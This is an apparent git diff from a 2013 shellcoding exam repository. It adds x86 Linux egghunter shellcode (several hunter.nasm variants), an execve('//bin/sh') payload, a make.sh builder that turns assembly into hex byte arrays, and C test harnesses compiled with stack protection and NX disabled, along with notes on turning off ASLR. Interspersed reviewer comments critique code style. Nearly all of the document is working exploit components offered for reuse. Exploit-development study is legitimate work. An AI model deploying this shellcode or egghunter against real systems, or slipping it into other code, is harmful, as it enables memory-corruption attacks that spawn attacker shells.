+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access-scasd/payload.nasm b/exam3/access-scasd/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-scasd/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access-scasd/shellcode.c b/exam3/access-scasd/shellcode.c
new file mode 100644
index 0000000..e0102bc
--- /dev/null
+++ b/exam3/access-scasd/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
diff --git a/exam3/access/NOTES b/exam3/access/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access/USAGE b/exam3/access/USAGE
new file mode 100644
index 0000000..5fb491d
--- /dev/null
+++ b/exam3/access/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access$ ./shellcode
+Hunter Length: 44
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access/hunter.nasm b/exam3/access/hunter.nasm
new file mode 100644
index 0000000..cd9c50d
--- /dev/null
+++ b/exam3/access/hunter.nasm
@@ -0,0 +1,59 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ xor edx, edx ; Searching the whole memory
+
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x8] ; next address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ cmp dword [edx], egg1
+ jne nextAddr
+ cmp dword [edx+0x4], egg2
+ jne nextAddr
+
+ lea ecx, [edx+0x8]
+ jmp ecx
+
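Review bot: The comment on `or dx, 0xfff` claims it is "The same as add dx, 4095", which only holds when the low 12 bits of EDX are already zero; what the instruction actually does is move EDX to the last byte of the current page so that the following `inc edx` lands on the next page boundary, and the comment should say that. The bare constants `0x21`, `-14` and `0xfff` would read better as named symbols in the style of the existing `egg1`/`egg2` definitions, e.g. `__NR_access equ 33`, `EFAULT equ 14` and `PAGE_MASK equ 0xfff`. `cmp al, -14` inspects only the low byte of the return value, so its comment should state that the full 32-bit `-EFAULT` is assumed there. The `section .data` header above the two `equ` lines is misleading because `equ` emits no data; the definitions can live in `.text`, or the section line can be dropped.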
diff --git a/exam3/access/make.sh b/exam3/access/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/access/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
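Review bot: The shebang `#!/usr/bin/env sh` at the top does not match the script body, which uses bash-only constructs — the `[[ … ]]` tests, the `DEFAULTEGG=( … )` / `NEWEGG=( … )` arrays with `${NEWEGG[0]}` indexing, and `echo -n`; on systems where `sh` is dash or another POSIX shell the array assignment is a syntax error and `[[` is "command not found". The first line should be `#!/usr/bin/env bash`. The script also keeps going after a failed `nasm`, `ld` or `gcc` step and still prints "All done!", so a `set -e` near the top (or an explicit `|| exit 1` on each build command) would stop it from emitting a stale or empty `shellcode.c`. The `exam3/basic/make.sh` hunk is byte-identical and needs the same changes.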
diff --git a/exam3/access/payload.nasm b/exam3/access/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
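Review bot: The header comment `; Filename: payload-execve-stack.nasm` does not match the file's actual name, `payload.nasm`, and should be corrected so it stays greppable. The inline comments on the three `push` instructions are imprecise: `push 0x68732f6e ; '//bin/sh' in reverse` pushes the little-endian dword for the last four bytes `n/sh`, and `push 0x69622f2f` the dword for `//bi`, so the string reads in order once both are on the stack; `; NULL termination of a stack` in the ECX block is the NULL that terminates the argv array, and the EDX block builds an envp array holding only NULL. Stating the register contract once at the top — `; execve("//bin/sh", {"//bin/sh", NULL}, {NULL}): EBX = path, ECX = argv, EDX = envp` — would make the three blocks readable without decoding the immediates. The `exam3/basic/payload.nasm` hunk is identical and needs the same edits.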
diff --git a/exam3/access/shellcode.c b/exam3/access/shellcode.c
new file mode 100644
index 0000000..de0a7a1
--- /dev/null
+++ b/exam3/access/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
diff --git a/exam3/basic/NOTES b/exam3/basic/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/basic/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/basic/USAGE b/exam3/basic/USAGE
new file mode 100644
index 0000000..f70903e
--- /dev/null
+++ b/exam3/basic/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+basic$ ./make.sh "egg.MaRk"
+ [I] Using custom EGG mark: egg.MaRk
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+basic$ ./shellcode
+Hunter Length: 21
+Payload Length: 36
+sh-4.1$ exit
diff --git a/exam3/basic/hunter.nasm b/exam3/basic/hunter.nasm
new file mode 100644
index 0000000..da46f05
--- /dev/null
+++ b/exam3/basic/hunter.nasm
@@ -0,0 +1,40 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; Searching for the Egg marker
+next:
+ inc eax ; Searching forward (can also try dec eax)
+isEgg:
+ cmp dword [eax-8], egg1 ; Checking if we can see egg1
+ jne next ; If not, continuing to search
+ cmp dword [eax-4], egg2
+ jne next
+
+ call eax ; Once found, we call our payload
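Review bot: `_start` never initialises EAX before `inc eax` at `next:`, so the scan starts from whatever the register holds when the hunter is entered; this looks deliberate (the comment offers `dec eax` as an alternative) but it is an undocumented precondition and belongs in the header, e.g. `; Precondition: EAX holds the address the scan starts from; the caller's register state is relied upon.` This variant also performs no accessibility check before `cmp dword [eax-8], egg1`, so the first read from an unmapped page ends the process with SIGSEGV — the header should name that limitation and point to the `access` variants in this commit, which guard each page with the access syscall. As in the other hunters, `section .data` wrapping two `equ` symbols emits nothing and is misleading; the definitions belong in `.text`, or the section line should go.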
diff --git a/exam3/basic/make.sh b/exam3/basic/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/basic/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
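Review bot: The egg-length check on the `elif` line runs `expr length $ARG1` unquoted and twice, so an argument containing whitespace or glob characters is word-split before `expr` sees it, and `-ge 8 && -le 8` is a roundabout spelling of equality; `elif [ "$(printf %s "$ARG1" | wc -c)" -ne 8 ]; then` is shorter, quotes correctly and counts bytes, which is what the USAGE file promises (`${#ARG1}` would count characters instead). The comments `# Uncomment to save EGGMARK in HEX` and `# Uncomment to save new EGGMARK in HEX format` sit above lines that are already active, so they are stale and should be rewritten as `# Convert … to \xHH form`. The unquoted `$ARG1`, `$EGGMARK`, `$HUNTERCODE`, `$DEFEGG1`/`$NEWEGG1` expansions feeding `echo -n` and the `sed` replacement scripts should be double-quoted for the same reason, e.g. `sed "s/$DEFEGG1/$NEWEGG1/g"`. The same lines appear in the `exam3/access/make.sh` hunk.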
diff --git a/exam3/basic/payload.nasm b/exam3/basic/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/basic/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
